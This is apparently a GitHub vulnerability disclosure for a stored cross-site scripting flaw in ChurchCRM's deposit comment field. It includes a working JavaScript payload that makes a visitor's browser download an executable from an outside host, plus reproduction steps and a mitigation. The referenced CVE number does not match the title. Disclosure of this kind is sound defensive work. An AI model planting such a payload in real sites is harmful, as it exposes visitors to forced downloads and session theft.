CVE-2020-28849: Cross Site Scripting Vulnerability leading to Remote File Inclusion · Issue #5477 · ChurchCRM/CRM

Name: Stored Cross Site Scripting leading to Remote File Inclusion vulnerability
Description: ChurchCRM application allows stored XSS , via ‘Add new Deposit’ module, that is rendered upon ‘View All Deposits’ page visit.
Cross Site Scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to the web application. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
Impact: The vulnerability allows an attacker to send malicious JavaScript code which could result in hijacking of the user’s cookie/session tokens , redirecting the user to a malicious webpage, downloading malicious files hosted on attackers server and performing many other unintended browser actions.
Version Affected: 4.2.1 and below
Payload Used:
<script>var link = document.createElement(‘a’); link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe’; link.download = '’; document.body.appendChild(link); link.click(); </script>
Vulnerable URL: /master/FindDepositSlip.php
Vulnerable Parameters: Deposit Comment
Steps to Reproduce:

1. Login to the application, go to ‘View all Deposits’ module.
2. Add the payload in the ‘Deposit Comment’ field and click "Add New Deposit".
3. Payload is executed and a .exe file is downloaded.

Reference :
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17205
POC :

Mitigation:
Proper input validation and encoding should be employed to prevent the execution of any hazardous scripts.
Note: There are multiple locations apart from Deposit module where the input is not sanitized properly